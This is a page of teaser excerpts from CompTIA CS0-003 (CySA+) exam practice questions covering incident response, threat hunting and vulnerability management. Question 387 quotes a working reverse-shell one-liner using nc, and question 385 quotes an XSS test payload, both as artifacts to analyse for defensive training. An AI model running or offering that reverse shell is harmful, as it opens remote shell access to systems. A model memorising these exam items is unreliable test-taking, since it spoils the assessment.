CS0-003 Exam Questions
658 real CS0-003 exam questions with expert-verified answers and explanations. Page 8 of 14.
- Question #357Security operations
An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy and firewall. Upon further investigation, it appears that the proxy and fire...
Cyber Kill Chaincommand and controlnetwork anomalies - Question #358Incident Response and Management
An organization's email account was compromised by a bad actor. Given the following information: Which of the following is the length of time the team took to detect the threat?
Incident detectiontime metricslog analysis - Question #359Security operations
A threat hunter seeks to identify new persistence mechanisms installed in an organization's environment. In collecting scheduled tasks from all enterprise workstations, the followi...
Threat huntingpersistence mechanismsmalware analysis - Question #360Security operations
A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following types of activities is being observed?
Network scanningprecursors to attackthreat detection - Question #361CompTIA A+ / IT Fundamentals - Operational Procedures: Demonstrate the ability to use proper communication and documentation techniques, apply troubleshooting methodology, and identify the root cause of escalated help desk issues to provide effective resolution.
SIMULATION Welcome to the Enterprise Help Desk System. Please work the ticket escalated to you in the help desk ticket queue. INSTRUCTIONS Click on the ticket to see the ticket det...
Help Desk TroubleshootingRoot Cause AnalysisTicket EscalationIT Support Methodology - Question #362CompTIA Security+ Domain 4.0 - Security Operations: Applying appropriate incident response procedures, analyzing indicators of compromise, and implementing controls mapped to attack lifecycle stages to improve organizational security posture.
SIMULATION A company recently experienced a security incident. The security team has determined a user clicked on a link embedded in a phishing email that was sent to the entire co...
Incident ResponseThreat IntelligenceKill Chain AnalysisSecurity Controls - Question #363Vulnerability Management
An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/...
CVSSvulnerability metricsexploit maturity - Question #364Incident Response and Management
A security analyst detects an email server that had been compromised in the internal network. Users have been reporting strange messages in their email inboxes and unusual network...
incident responsecontainmentIR lifecycle - Question #365Security operations
A SIEM alert is triggered based on execution of a suspicious one-liner on two workstations in the organization's environment. An analyst views the details of these events below: Wh...
SIEM analysisPowerShellcommand-line analysisattacker intent - Question #366Security operations
When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop backgrounds containing hos...
process analysisincident investigationanomalous behavior - Question #367Incident Response and Management
Which of the following evidence collection methods is most likely to be acceptable in court cases?
forensic evidencechain of custodybit-level image - Question #368Incident Response and Management
A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next?
incident responserecoveryforensic analysisIR lifecycle - Question #369Security operations
While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the following controls is most...
dynamic analysisASLRexploit mitigation - Question #370Incident Response and Management
A company brings in a consultant to make improvements to its website. After the consultant leaves. a web developer notices unusual activity on the website and submits a suspicious...
BackdoorMalicious codeWeb securityPersistence - Question #371Security operations
Which of the following makes STIX and OpenloC information readable by both humans and machines?
STIXOpenIOCthreat intelligenceXML - Question #372Vulnerability Management
An analyst is evaluating the following vulnerability report: Which of the following vulnerability report sections provides information about the level of impact on data confidentia...
vulnerability reportingCVSSconfidentiality impact - Question #373Security operations
Which of the following best describes the importance of implementing TAXII as part of a threat intelligence program?
TAXIIthreat intelligenceinformation sharingautomation - Question #374Incident Response and Management
During a recent site survey. an analyst discovered a rogue wireless access point on the network. Which of the following actions should be taken first to protect the network while p...
rogue access pointincident responsecontainmentevidence preservation - Question #375Security operations
While a security analyst for an organization was reviewing logs from web servers. the analyst found several successful attempts to downgrade HTTPS sessions to use cipher modes of o...
TLSHTTPSpadding oracle attackcipher suites - Question #376Incident Response and Management
An analyst views the following log entries: The organization has a partner vendor with hosts in the 216.122.5.x range. This partner vendor is required to have access to monthly rep...
Incident ResponseLog AnalysisAccess ControlIncident Prioritization - Question #377Security operations
An analyst is conducting monitoring against an authorized team that win perform adversarial techniques. The analyst interacts with the team twice per day to set the stage for the t...
purple teamred teamblue teamsecurity exercise - Question #378Reporting and Communication
The Chief Executive Officer (CEO) has notified that a confidential trade secret has been compromised. Which of the following communication plans should the CEO initiate?
incident communicationtrade secretlegal requirements - Question #379Incident Response and Management
During an incident, analysts need to rapidly investigate by the investigation and leadership teams. Which of the following best describes how PII should be safeguarded during an in...
PII protectiondata encryptionaccess controlincident investigation - Question #380Security operations
A security analyst is reviewing the logs of a web server and notices that an attacker has attempted to exploit a SQL injection vulnerability. Which of the following tools can the a...
SQL injectionweb application firewallweb security - Question #381Security operations
Which Of the following techniques would be best to provide the necessary assurance for embedded software that drives centrifugal pumps at a power Plant?
formal methodsembedded systemsICS securitysoftware assurance - Question #382Security operations
A security team identified several rogue Wi-Fi access points during the most recent network scan. The network scans occur once per quarter. Which of the following controls would be...
continuous monitoringrogue access pointsnetwork securityasset inventory - Question #383Vulnerability Management
An analyst needs to provide recommendations based on a recent vulnerability scan: Which of the following should the analyst recommend addressing to ensure potential vulnerabilities...
Vulnerability ScanningScan ConfigurationPrivilege Escalation (Scanning)Vulnerability Identification - Question #384Vulnerability Management
A security analyst recently used Arachni to perform a vulnerability assessment of a newly developed web application. The analyst is concerned about the following output: [+] XSS: I...
Vulnerability AssessmentWeb Application SecurityCross-Site Scripting (XSS)Security Headers - Question #385Vulnerability Management
A security analyst found the following vulnerability on the company's website: <INPUT TYPE="IMAGE" SRC="javascript:alert(`test');"> Which of the following should be implemented to...
XSSinput sanitizationweb securityvulnerability remediation - Question #386Security Operations
A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will act as a wiper. Which of the following parts of the Cyber Kill Chain does...
Cyber Kill Chainweaponizationlogic bombsabotage - Question #387Security Operations
A security analyst detected the following suspicious activity: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f Which of the following most likely de...
reverse shellcommand linenetwork connectionsincident detection - Question #388Security Operations
After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Windows 11 users have cons...
change managementtestingpatchingsystem updates - Question #389Vulnerability Management
A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings: Which of the following vu...
vulnerability scanningpatch prioritizationrisk assessmentweb server security - Question #390Security Operations
Which of the following most accurately describes the Cyber Kill Chain methodology?
Cyber Kill Chainattack methodologythreat intelligence - Question #391Incident Response and Management
Which of the following is a benefit of the Diamond Model of Intrusion Analysis?
Diamond Modelintrusion analysisthreat intelligenceknowledge gaps - Question #392Incident Response and Management
Which of the following is the most important reason for an incident response team to develop a formal incident declaration?
incident response planincident declarationroles and responsibilities - Question #393Vulnerability Management
A security manager is looking at a third-party vulnerability metric (SMITTEN) to improve upon the company's current method that relies on CVSSv3. Given the following: Which of the...
vulnerability prioritizationCVSSrisk metricsvulnerability management - Question #394Incident Response and Management
Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following tools should be used t...
forensic evidencechain of custodymobile forensicstamper-evident - Question #395Security Operations
An analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds continue to work. Which of the following is the most likely reason the fi...
data enrichmentfirewall logstroubleshootingcertificates - Question #396Security Operations
A security analyst noticed the following entry on a web server log: Connection refused in /hj/var/www/showimage.php on line 7 Which of the following malicious activities was most l...
web server logsSSRFweb application attacksincident detection - Question #397Security Operations
A security analyst is reviewing events that occurred during a possible compromise. The analyst obtains the following log: Which of the following is most likely occurring, based on...
log analysisvulnerability scanningreconnaissanceadversary TTPs - Question #398Vulnerability Management
AXSS vulnerability was reported on one of the non-sensitive/non-mission-critical public websites of a company. The security department confirmed the finding and needs to provide a...
XSS vulnerabilityweb application securityvulnerability remediationWAF - Question #399Incident Response and Management
An organization has tracked several incidents that are listed in the following table: Which of the following is the organization's MTTD?
MTTDincident metricsincident responsesecurity metrics - Question #400Vulnerability Management
During an internal code review, software called "ACE" was discovered to have a vulnerability that allows the execution of arbitrary code. The vulnerability is in a legacy, third-pa...
vulnerability managementrisk mitigationcompensating controlssoftware supply chain - Question #401Reporting and Communication
Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the general public, as a be...
incident communicationpublic relationslegal compliancestakeholder management - Question #402Vulnerability Management
A security analyst reviews the following results of a Nikto scan: Which of the following should the security administrator investigate next?
Nikto scanvulnerability scanningweb application securityinvestigation - Question #403Vulnerability Management
Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered....
vulnerability managementasset managementconfiguration managementpatch management - Question #404Vulnerability Management
A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and has decided that the r...
vulnerability remediationrisk acceptancechange freezebusiness constraints - Question #405Vulnerability Management
An organization is conducting a pilot deployment of an e-commerce application. The application's source code is not available. Which of the following strategies should an analyst r...
application security testingpenetration testingdynamic analysisblack box testing - Question #406Incident Response and Management
An attacker recently gained unauthorized access to a financial institution's database, which contains confidential information. The attacker exfiltrated a large amount of data befo...
Root cause analysisLog analysisIncident response stepsData exfiltration